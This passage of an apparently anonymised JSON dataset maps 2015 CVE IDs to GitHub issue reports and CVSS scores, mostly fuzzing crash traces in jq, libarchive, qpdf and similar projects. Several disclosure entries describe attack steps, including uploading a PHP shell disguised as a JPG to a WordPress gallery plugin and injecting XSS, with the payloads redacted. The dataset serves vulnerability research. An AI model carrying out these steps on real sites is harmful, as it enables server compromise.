  775. "description": "Heap based buffer overflow in APITAG On Sun, Oct NUMBERTAG at NUMBERTAG Jakub Wilk wrote: > Package: jq > Version NUMBERTAG dfsg NUMBERTAG Usertags: afl > > There's heap based buffer overflow in APITAG > > $ valgrind jq . FILETAG NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright > info NUMBERTAG Command: jq . FILETAG NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG D NUMBERTAG B: check_literal APITAG NUMBERTAG by NUMBERTAG E NUMBERTAG jv_parser_next APITAG NUMBERTAG by NUMBERTAG C: jq_util_input_next_input APITAG NUMBERTAG by NUMBERTAG D3C9: main APITAG NUMBERTAG Address NUMBERTAG b7c5e8 is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG A1DC: malloc (in > PATHTAG NUMBERTAG by NUMBERTAG C3D0: realloc (in > PATHTAG NUMBERTAG by NUMBERTAG B NUMBERTAG jv_mem_realloc APITAG NUMBERTAG by NUMBERTAG D NUMBERTAG tokenadd APITAG NUMBERTAG by NUMBERTAG E NUMBERTAG scan APITAG NUMBERTAG by NUMBERTAG E NUMBERTAG jv_parser_next APITAG NUMBERTAG by NUMBERTAG C: jq_util_input_next_input APITAG NUMBERTAG by NUMBERTAG D3C9: main APITAG > ... > > APITAG that I rebuilt the package with noopt to make the backtrace more > useful.) > > This bug was found using American fuzzy lop: > URLTAG see CVETAG",
  776. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  777. "severity": "CRITICAL",
  778. "baseScore": 9.8,
  779. "impactScore": 5.9,
  780. "exploitabilityScore": 3.9
  781. },
  782. {
  783. "CVE_ID": "CVE-2015-8871",
  784. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/563",
  785. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/563",
  786. "Repo_new": "uclouvain/openjpeg",
  787. "Issue_Created_At": "2015-08-14T16:58:01Z",
  788. "description": "Use after free in opj_j2k_write_mco. Hi, I have found a potential use after free in opj_j2k_write_mco function, of the FILETAG file. At line NUMBERTAG URLTAG , l_current_data is set to p_j2k APITAG But at line NUMBERTAG URLTAG , p_j2k APITAG is used as arg of realloc, and so can be freed. But l_current_data is used later (line NUMBERTAG URLTAG NUMBERTAG URLTAG ...), and so can point to a freed memory zone A simple fixed, should be to affect l_current_data to p_j2k APITAG after the line NUMBERTAG URLTAG The vulnerability was found by my static binary analyzer gueb (that will become open source soon) Regards, Feist Josselin",
  789. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  790. "severity": "CRITICAL",
  791. "baseScore": 9.8,
  792. "impactScore": 5.9,
  793. "exploitabilityScore": 3.9
  794. },
  795. {
  796. "CVE_ID": "CVE-2015-8872",
  797. "Issue_Url_old": "https://github.com/dosfstools/dosfstools/issues/12",
  798. "Issue_Url_new": "https://github.com/dosfstools/dosfstools/issues/12",
  799. "Repo_new": "dosfstools/dosfstools",
  800. "Issue_Created_At": "2015-09-08T08:18:17Z",
  801. "description": "APITAG invalid memory access in get_fat. This file will generate some invalid memory read in APITAG URLTAG Judging from the output of address sanitizer and valgrind it is a bit unusual, it seems to be neither memory on the stack or heap, but it also doesn't crash the app if run without asan or valgrind. Happens both with the latest release and latest git code. Found with american fuzzy lop. This is the address sanitizer stack trace NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG d8 (pc NUMBERTAG f1ace bp NUMBERTAG ffcae3ad NUMBERTAG sp NUMBERTAG ffcae3ad NUMBERTAG T NUMBERTAG f1acd in get_fat PATHTAG NUMBERTAG ea4e6 in check_file PATHTAG NUMBERTAG ea4e6 in check_files PATHTAG NUMBERTAG ede NUMBERTAG in scan_dir PATHTAG NUMBERTAG ede NUMBERTAG in subdirs PATHTAG NUMBERTAG e4f NUMBERTAG in scan_root PATHTAG NUMBERTAG ddaf4 in main PATHTAG NUMBERTAG efe5b4eef9f in __libc_start_main PATHTAG NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG get_fat",
  802. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  803. "severity": "MEDIUM",
  804. "baseScore": 6.2,
  805. "impactScore": 3.6,
  806. "exploitabilityScore": 2.5
  807. },
  808. {
  809. "CVE_ID": "CVE-2015-8877",
  810. "Issue_Url_old": "https://github.com/libgd/libgd/issues/173",
  811. "Issue_Url_new": "https://github.com/libgd/libgd/issues/173",
  812. "Repo_new": "libgd/libgd",
  813. "Issue_Created_At": "2015-07-13T16:02:50Z",
  814. "description": "APITAG can leak memory. In APITAG a tmp_im is created with APITAG URLTAG , but later freed with APITAG URLTAG instead of APITAG This is likely to cause a memory leak. See also the related downstream bug report CVETAG .",
  815. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  816. "severity": "HIGH",
  817. "baseScore": 7.5,
  818. "impactScore": 3.6,
  819. "exploitabilityScore": 3.9
  820. },
  821. {
  822. "CVE_ID": "CVE-2015-8928",
  823. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/550",
  824. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/550",
  825. "Repo_new": "libarchive/libarchive",
  826. "Issue_Created_At": "2015-05-21T19:37:41Z",
  827. "description": "Out of bounds read in function APITAG on malformed mtree file. This sample file will generate an out of bounds read access: URLTAG File content NUMBERTAG link NUMBERTAG Address Sanitizer output NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ef4f at pc NUMBERTAG b NUMBERTAG cc bp NUMBERTAG fff5ddb NUMBERTAG d0 sp NUMBERTAG fff5ddaf NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ef4f thread T NUMBERTAG b NUMBERTAG cb in __asan_memcpy ( PATHTAG NUMBERTAG d NUMBERTAG ac in process_add_entry PATHTAG NUMBERTAG b4fc1 in read_mtree PATHTAG NUMBERTAG ad NUMBERTAG in read_header PATHTAG NUMBERTAG d in _archive_read_next_header2 PATHTAG NUMBERTAG de2 in _archive_read_next_header PATHTAG NUMBERTAG b0c7de in archive_read_next_header PATHTAG NUMBERTAG e1f in read_archive PATHTAG NUMBERTAG b in tar_mode_x PATHTAG NUMBERTAG fee NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG f4e NUMBERTAG f9f in __libc_start_main PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG ef4f is located NUMBERTAG bytes to the left of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG c NUMBERTAG in realloc ( PATHTAG NUMBERTAG a NUMBERTAG in archive_string_ensure PATHTAG NUMBERTAG ce NUMBERTAG in readline PATHTAG NUMBERTAG b NUMBERTAG d7 in read_mtree PATHTAG NUMBERTAG ad NUMBERTAG in read_header PATHTAG NUMBERTAG d in _archive_read_next_header2 PATHTAG NUMBERTAG de2 in _archive_read_next_header PATHTAG NUMBERTAG b0c7de in archive_read_next_header PATHTAG NUMBERTAG e1f in read_archive PATHTAG NUMBERTAG b in tar_mode_x PATHTAG NUMBERTAG fee NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG f4e NUMBERTAG f9f in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow NUMBERTAG asan_memcpy Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9de0: fa fa fa fa NUMBERTAG fa[fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff9df NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
  828. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  829. "severity": "MEDIUM",
  830. "baseScore": 5.5,
  831. "impactScore": 3.6,
  832. "exploitabilityScore": 1.8
  833. },
  834. {
  835. "CVE_ID": "CVE-2015-8931",
  836. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/539",
  837. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/539",
  838. "Repo_new": "libarchive/libarchive",
  839. "Issue_Created_At": "2015-05-12T16:22:51Z",
  840. "description": "undefined behaviour in APITAG When compiling libarchive with the compile flag fsanitize=undefined (enabling undefined behaviour sanitizer) it'll throw a warning when trying to open any mtree file: APITAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'long int' APITAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'long int' This is the code that's causing this: static int NUMBERTAG t get_time_t_max(void) { if defined(TIME_T_MAX) return TIME_T_MAX; else static time_t t; time_t a; if (t NUMBERTAG a NUMBERTAG while (a > t) { t = a; a = a NUMBERTAG return t; endif } static int NUMBERTAG t get_time_t_min(void) { if defined(TIME_T_MIN) return TIME_T_MIN; else / 't' will hold the minimum value, which will be zero (if time_t is unsigned) or NUMBERTAG n (if time_t is signed). / static int computed; static time_t t; time_t a; if (computed NUMBERTAG a = (time_t NUMBERTAG while (a < t) { t = a; a = a NUMBERTAG computed NUMBERTAG return t; endif } What libarchive is trying to do here is calculating the value of TIME_T_MIN/MAX by triggering an overflow. However overflows in signed values are undefined in C. This code is therefore strictly speaking invalid, the compiler may do whatever it likes in such situations, without any defined outcome. I haven't come up with an elegant other way to do this yet. Probably the best would be to convince the glibc devs to define TIME_T_MIN/MAX in their headers.",
  841. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  842. "severity": "HIGH",
  843. "baseScore": 7.8,
  844. "impactScore": 5.9,
  845. "exploitabilityScore": 1.8
  846. },
  847. {
  848. "CVE_ID": "CVE-2015-8932",
  849. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/547",
  850. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/547",
  851. "Repo_new": "libarchive/libarchive",
  852. "Issue_Created_At": "2015-05-20T00:04:53Z",
  853. "description": "undefined behaviour / invalid shiftleft in compress_bidder_init. This file will trigger a shiftleft of NUMBERTAG bytes of a signed NUMBERTAG bit integer: URLTAG (just two bytes NUMBERTAG f NUMBERTAG d) A shiftleft of the full size of a variable type is undefined in c. This can be seen by compiling libarchive with fsanitize=undefined and trying to unpack the file (bsdtar xf). Here's the error message / crash dump: APITAG runtime error: left shift of NUMBERTAG by NUMBERTAG places cannot be represented in type 'int NUMBERTAG a NUMBERTAG b6 in compress_bidder_init PATHTAG NUMBERTAG fe NUMBERTAG a in choose_filters PATHTAG NUMBERTAG ec8c2 in archive_read_open1 PATHTAG NUMBERTAG b9c in archive_read_open_filenames PATHTAG NUMBERTAG in archive_read_open_filename PATHTAG NUMBERTAG in read_archive PATHTAG NUMBERTAG b in tar_mode_x PATHTAG NUMBERTAG fee NUMBERTAG in main PATHTAG NUMBERTAG f1be NUMBERTAG a4f9f in __libc_start_main PATHTAG NUMBERTAG in _start ( PATHTAG ) SUMMARY: APITAG undefined behavior APITAG",
  854. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  855. "severity": "MEDIUM",
  856. "baseScore": 5.5,
  857. "impactScore": 3.6,
  858. "exploitabilityScore": 1.8
  859. },
  860. {
  861. "CVE_ID": "CVE-2015-8933",
  862. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/548",
  863. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/548",
  864. "Repo_new": "libarchive/libarchive",
  865. "Issue_Created_At": "2015-05-20T00:15:08Z",
  866. "description": "undefined behaviour / signed integer overflow in APITAG Using this malformed tar file with \"bsdtar tf [input]\" will cause a signed integer overflow: FILETAG Signed integer overflows are undefined in C. This can be seen by compiling libarchive with fsanitize=undefined. Here's the crash dump: PATHTAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'long NUMBERTAG c NUMBERTAG in archive_read_format_tar_skip PATHTAG NUMBERTAG in archive_read_data_skip PATHTAG NUMBERTAG a NUMBERTAG in read_archive PATHTAG NUMBERTAG dbb in tar_mode_t PATHTAG NUMBERTAG feddc in main PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG f9f in __libc_start_main PATHTAG NUMBERTAG in _start ( PATHTAG ) SUMMARY: APITAG undefined behavior APITAG bsdtar: (null) bsdtar: Error exit delayed from previous errors.",
  867. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  868. "severity": "MEDIUM",
  869. "baseScore": 5.5,
  870. "impactScore": 3.6,
  871. "exploitabilityScore": 1.8
  872. },
  873. {
  874. "CVE_ID": "CVE-2015-8945",
  875. "Issue_Url_old": "https://github.com/openshift/origin/issues/3951",
  876. "Issue_Url_new": "https://github.com/openshift/origin/issues/3951",
  877. "Repo_new": "openshift/origin",
  878. "Issue_Created_At": "2015-07-29T20:28:23Z",
  879. "description": "openshift node is logging private RSA keys to the systemd journal. ERRORTAG",
  880. "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  881. "severity": "MEDIUM",
  882. "baseScore": 5.1,
  883. "impactScore": 3.6,
  884. "exploitabilityScore": 1.4
  885. },
  886. {
  887. "CVE_ID": "CVE-2015-8947",
  888. "Issue_Url_old": "https://github.com/behdad/harfbuzz/issues/139",
  889. "Issue_Url_new": "https://github.com/harfbuzz/harfbuzz/issues/139",
  890. "Repo_new": "harfbuzz/harfbuzz",
  891. "Issue_Created_At": "2015-10-09T20:45:00Z",
  892. "description": "fuzzing harfbuzz. This in an umbrella issue for setting up regular fuzzing for harfbuzz and fixing the bugs that we find with fuzzing. The starting point is the target function below used with FILETAG . CODETAG Eventually we'll need to submit this function to harfbuzz repo and extend it to cover more code. Currently, this is my workflow to build the fuzzer NUMBERTAG Get fresh FILETAG and build FILETAG NUMBERTAG ERRORTAG",
  893. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H",
  894. "severity": "HIGH",
  895. "baseScore": 7.6,
  896. "impactScore": 4.7,
  897. "exploitabilityScore": 2.8
  898. },
  899. {
  900. "CVE_ID": "CVE-2015-9096",
  901. "Issue_Url_old": "https://github.com/rubysec/ruby-advisory-db/issues/215",
  902. "Issue_Url_new": "https://github.com/rubysec/ruby-advisory-db/issues/215",
  903. "Repo_new": "rubysec/ruby-advisory-db",
  904. "Issue_Created_At": "2015-12-11T05:59:01Z",
  905. "description": "Add advisory for SMTP injection vulnerability in mail NUMBERTAG Need an advisory for the mail vulnerability discussed in FILETAG Affects NUMBERTAG",
  906. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  907. "severity": "MEDIUM",
  908. "baseScore": 6.1,
  909. "impactScore": 2.7,
  910. "exploitabilityScore": 2.8
  911. },
  912. {
  913. "CVE_ID": "CVE-2015-9228",
  914. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/6",
  915. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/6",
  916. "Repo_new": "cybersecurityworks/disclosed",
  917. "Issue_Created_At": "2015-09-14T11:33:13Z",
  918. "description": "Malicious File Upload in APITAG Gallery by Photocrati Version NUMBERTAG Details ================ Word Press Product Bugs Report Bug Name Malicious File upload Software: APITAG Gallery Version NUMBERTAG Last Updated NUMBERTAG Homepage: URLTAG Compatible Up to Wordpress NUMBERTAG ersion APITAG NUMBERTAG or higher) Severity High Description: Malicious File upload vulnerability in APITAG plugin APITAG Gallery Proof of concept: (POC) ================== Visit the following page on a site with this plugin installed in the following URL URLTAG which is vulnerable to file upload in file and name variable from which name variable extension is modified from JPG to PHP and file variable containing image content/information is semi modified with PHP shell to be executed in the server which can be accessed with the help of publicly available URL. here, it is URLTAG APITAG NUMBERTAG APITAG The Post Request file and name variable in the URL URLTAG is vulnerable to file upload. In which name variable extension is modified from JPG to PHP and file variable is added with PHP shell to be executed in the server which can be accessed with the help of publicly available URL URLTAG FILETAG APITAG NUMBERTAG APITAG Normal request to the server FILETAG APITAG NUMBERTAG APITAG File variable modified from JPG to PHP FILETAG APITAG NUMBERTAG APITAG Mixing the content of the uploading file with shell content to get executed FILETAG APITAG NUMBERTAG APITAG Showing that file has been uploaded as image into the server FILETAG APITAG NUMBERTAG APITAG Originally, file have been stored in PHP format which can be executed from outside login FILETAG APITAG NUMBERTAG APITAG Shell Executed giving system information of the hosted server. APITAG Steps APITAG NUMBERTAG Logon into any wordpress application (localhost or public host NUMBERTAG Move on to Next Gen Gallery plugin file upload option available on products NUMBERTAG Upload JPG file to the server through file upload option NUMBERTAG Modify the file variable contains JPG extension to PHP. Also, edit and add shell content to the name variable body containing JPG information/content. APITAG APITAG NUMBERTAG Discovered in APITAG Gallery NUMBERTAG ersion NUMBERTAG Reported to EMAILTAG rg NUMBERTAG endor responded in the same NUMBERTAG Fixed in APITAG Gallery NUMBERTAG ersion. APITAG by: APITAG Sathish from APITAG Cyber Security Works Pvt Ltd APITAG",
  919. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  920. "severity": "HIGH",
  921. "baseScore": 8.8,
  922. "impactScore": 5.9,
  923. "exploitabilityScore": 2.8
  924. },
  925. {
  926. "CVE_ID": "CVE-2015-9229",
  927. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/5",
  928. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/5",
  929. "Repo_new": "cybersecurityworks/disclosed",
  930. "Issue_Created_At": "2015-09-14T11:10:04Z",
  931. "description": "XSS in APITAG Gallery by Photocrati Version NUMBERTAG Details ================ Word Press Product Bugs Report Bug Name XSS APITAG Site Scripting) Software: APITAG Gallery Version NUMBERTAG Last Updated NUMBERTAG Homepage: URLTAG Compatible Up to Wordpress NUMBERTAG ersion APITAG NUMBERTAG or higher) Severity High Description: XSS vulnerability in APITAG plugin APITAG Gallery Proof of concept: (POC) ================== Visit the following page on a site with this plugin installed. URLTAG and modify the value of APITAG images FILETAG APITAG NUMBERTAG APITAG XSS Payload injected to images FILETAG APITAG NUMBERTAG APITAG XSS Payload executed in the browser whenever the user views it. APITAG Steps APITAG NUMBERTAG Logon into any wordpress application (localhost or public host NUMBERTAG Modifying the variable images NUMBERTAG alttext] in APITAG Gallery Photocrati Version NUMBERTAG recently updated version) in the URL URLTAG NUMBERTAG Fill all the variables with APITAG payload and save it to view further NUMBERTAG Now, the added XSS payload will be executed whenever the user reviews it. APITAG APITAG NUMBERTAG Discovered in APITAG Gallery NUMBERTAG ersion NUMBERTAG Reported to EMAILTAG rg NUMBERTAG endor responded saying, APITAG you, we'll inform NGG about this NUMBERTAG Same vulnerability again discovered in APITAG Gallery NUMBERTAG ersion NUMBERTAG Reported to EMAILTAG rg NUMBERTAG Same vulnerability found & still exist in APITAG Gallery NUMBERTAG ersion. APITAG by: APITAG Sathish from APITAG Cyber Security Works Pvt Ltd APITAG",
  932. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  933. "severity": "MEDIUM",
  934. "baseScore": 4.8,
  935. "impactScore": 2.7,
  936. "exploitabilityScore": 1.7
  937. },
  938. {
  939. "CVE_ID": "CVE-2015-9230",
  940. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/3",
  941. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/3",
  942. "Repo_new": "cybersecurityworks/disclosed",
  943. "Issue_Created_At": "2015-09-14T10:25:09Z",
  944. "description": "XSS Vulnerability in APITAG Security Version NUMBERTAG Details ================ Word Press Product Bugs Report Bug Name XSS APITAG Site Scripting) Software: APITAG Security Version NUMBERTAG Last Updated NUMBERTAG Homepage: URLTAG Compatible Up to Wordpress NUMBERTAG ersion APITAG NUMBERTAG or higher) Severity High Description: XSS vulnerability in APITAG plugin APITAG Security Proof of concept: (POC) ================== Visit the following page on a site with this plugin installed. FILETAG and modify the value of APITAG variable with \"> APITAG APITAG APITAG payload and send the request to the server. Now, the added XSS payload will be echoed back from the server without validating the input. It also affects FILETAG file, $table_prefix and corrupts the database connectivity. APITAG APITAG XSS payload has been tried with the application once after implementing Unfiltered Html Settings as defined to FILETAG file. APITAG APITAG APITAG define( 'DISALLOW_UNFILTERED_HTML', true ); APITAG APITAG APITAG APITAG NUMBERTAG APITAG The Post Request APITAG variable in the URL FILETAG is vulnerable to Cross Site Scripting (XSS) APITAG NUMBERTAG APITAG Invalid HTTP script Request sent to the server through the vulnerable APITAG APITAG variable in the URL FILETAG APITAG NUMBERTAG APITAG Echoed back HTTP Response without validation. APITAG NUMBERTAG APITAG Response Executed in the browser with Cookie value APITAG NUMBERTAG APITAG $table_prefix is also damaged with the given XSS Payload APITAG NUMBERTAG APITAG Error message after the payload gets executed in the browser APITAG Steps APITAG NUMBERTAG Logon into any wordpress application (localhost or public host NUMBERTAG Modifying the value of APITAG variable in APITAG Security NUMBERTAG Fill all the variables with APITAG APITAG payload and send the request to the server NUMBERTAG Now, the added XSS payload will be echoed back from the server without validating the input even after FILETAG file has been configured with XSS filter settings NUMBERTAG It also affects FILETAG file $table_prefix and corrupts the database connectivity APITAG APITAG NUMBERTAG Discovered in APITAG Security Plugin NUMBERTAG Fixed in APITAG Security Plugin Version NUMBERTAG APITAG by: APITAG Sathish from Cyber Security Works Pvt Ltd",
  945. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  946. "severity": "MEDIUM",
  947. "baseScore": 4.8,
  948. "impactScore": 2.7,
  949. "exploitabilityScore": 1.7
  950. },
  951. {
  952. "CVE_ID": "CVE-2015-9236",
  953. "Issue_Url_old": "https://github.com/hapijs/hapi/issues/2850",
  954. "Issue_Url_new": "https://github.com/hapijs/hapi/issues/2850",
  955. "Repo_new": "hapijs/hapi",
  956. "Issue_Created_At": "2015-10-16T19:22:15Z",
  957. "description": "NUMBERTAG Release Notes. Summary hapi NUMBERTAG is primarily a rewrite of the CORS implementation. The previous code was both confusing, an incorrect implementation of the protocol, and allowed for configurations that at best returned inconsistent headers and at worst allowed cross origin activities that were expected to be forbidden. The change removes half the CORS options available and moves the implementation to be truly per route without any connection wide catch all. Upgrade time : low no time to a couple of hours for most users Complexity : low a bit of search and replace and removal of unsupported configs Risk : low low risk of side effects and few changes to keep track of overall Dependencies : medium removed the APITAG method Sponsor APITAG APITAG APITAG The NUMBERTAG major release is sponsored by FILETAG . Breaking Changes Removed the CORS configuration options: methods , APITAG , APITAG , APITAG , and override . Added the APITAG HTTP status code to the default list of cached responses. The qs module no longer parses dot notation names into sub objects by default. Removed APITAG . Removed id from the APITAG event data (was already available as a generic event property). New Features Allow response validation of non object responses (string, number, etc). New option to override empty APITAG HTTP status responses with APITAG . Bug fixes Fixes multiple issues with CORS, including a few security related. Updated dependencies qs from NUMBERTAG to NUMBERTAG Migration Checklist CORS You don't have to change anything if: not setting the cors route option using it with the defaults by setting the value to true not using the cors options: methods , APITAG , APITAG , APITAG , and override The main changes are: CORS preflight headers are no set only on reflight requests and no on resource requests. This means that the methods and APITAG options are no longer needed because the preflight response will return the requested method as specified by the protocol. This will ensure other methods which may not allow cross origin access to be separately configured. The override flag is no longer needed as the only header which you may manually set at the handler level is Access Control Expose Headers which will be appended by default. Setting any other CORS header manually will result in a conflict with the preflight response. The Access Control Allow Origin header is now always set to the incoming Origin header value. If the incoming value does not match the allowed origins, no CORS headers are set. Checklist: Make sure that if you are using the internal CORS feature, you are not setting ANY CORS headers yourself other than Access Control Expose Headers. If you need to set any other header manually, do not use the CORS feature! You will end up with a broken and potentially insecure implementation. Remove the options no longer supported. There is no need to replace them. Misc If you rely on the previous qs query parsing behavior of breaking dot notation into segments, you must set the APITAG option to true . This is available in route config APITAG and connection config APITAG . Replace APITAG with APITAG . If you listen to the request APITAG event, use the APITAG value instead of the removed APITAG value.",
  958. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  959. "severity": "MEDIUM",
  960. "baseScore": 5.3,
  961. "impactScore": 1.4,
  962. "exploitabilityScore": 3.9
  963. },
  964. {
  965. "CVE_ID": "CVE-2015-9236",
  966. "Issue_Url_old": "https://github.com/hapijs/hapi/issues/2840",
  967. "Issue_Url_new": "https://github.com/hapijs/hapi/issues/2840",
  968. "Repo_new": "hapijs/hapi",
  969. "Issue_Created_At": "2015-10-14T08:38:36Z",
  970. "description": "CORS route specific override can conflict with connection defaults. If the connection has CORS enabled but one route has it off, and the route is not GET, the OPTIONS prefetch request will return the default CORS headers and then the actual request will go through and return no CORS headers. This defeats the purpose of turning CORS on the route.",
  971. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  972. "severity": "MEDIUM",
  973. "baseScore": 5.3,
  974. "impactScore": 1.4,
  975. "exploitabilityScore": 3.9
  976. },
  977. {
  978. "CVE_ID": "CVE-2015-9243",
  979. "Issue_Url_old": "https://github.com/hapijs/hapi/issues/2980",
  980. "Issue_Url_new": "https://github.com/hapijs/hapi/issues/2980",
  981. "Repo_new": "hapijs/hapi",
  982. "Issue_Created_At": "2015-12-17T06:16:58Z",
  983. "description": "CORS regression in hapi NUMBERTAG It seems that the server option's route defaults are no longer used when route specific config options are present NUMBERTAG worked as expected, and APITAG does not. ERRORTAG ERRORTAG But adding a 'cors' configuration object to the route, causes the 'access control allow credentials' header to be dropped ERRORTAG ERRORTAG Is this intentional? I much prefer being able to have default values in place and explicitly override specific keys, rather than have to respecify all values for a route where only one of them needs customized.",
  984. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  985. "severity": "MEDIUM",
  986. "baseScore": 5.9,
  987. "impactScore": 3.6,
  988. "exploitabilityScore": 2.2
  989. },
  990. {
  991. "CVE_ID": "CVE-2015-9252",
  992. "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/51",
  993. "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/51",
  994. "Repo_new": "qpdf/qpdf",
  995. "Issue_Created_At": "2015-09-02T13:08:54Z",
  996. "description": "crash / stack overflow with malformed input pdf. Passing this pdf to qpdf will cause a crash: FILETAG Looking at the stack trace this seems to be an endless recursion causing a stack overflow. Here's (part of) the stack trace when compiling qpdf with address sanitizer (latest git code NUMBERTAG ERROR: APITAG stack overflow on address NUMBERTAG ffdede NUMBERTAG pc NUMBERTAG f5ddac0dce7 bp NUMBERTAG ffdede NUMBERTAG e NUMBERTAG sp NUMBERTAG ffdede NUMBERTAG T NUMBERTAG f5ddac0dce6 in pcre_compile2 APITAG NUMBERTAG b in PCRE::PCRE(char const , int) PATHTAG NUMBERTAG ece NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG be in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&) PATHTAG NUMBERTAG c NUMBERTAG b in APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&, APITAG bool&, APITAG , QPDF , bool, bool, bool) PATHTAG NUMBERTAG c4c NUMBERTAG in APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&, APITAG bool&, APITAG , QPDF , bool, bool, bool) PATHTAG NUMBERTAG bcf0c in APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&, APITAG bool&, APITAG , QPDF ) PATHTAG NUMBERTAG b4d0 in APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&, int, int, bool) PATHTAG NUMBERTAG b NUMBERTAG in APITAG long long, APITAG std::char_traits APITAG , std::allocator APITAG > const&, int, int, int&, int&) PATHTAG NUMBERTAG da2 in QPDF::resolve(int, int) PATHTAG NUMBERTAG a NUMBERTAG e7 in APITAG , int, int) PATHTAG NUMBERTAG a NUMBERTAG e7 in APITAG PATHTAG NUMBERTAG a NUMBERTAG ca in APITAG PATHTAG NUMBERTAG d NUMBERTAG in APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&, int, int, bool) PATHTAG NUMBERTAG b NUMBERTAG in APITAG long long, APITAG 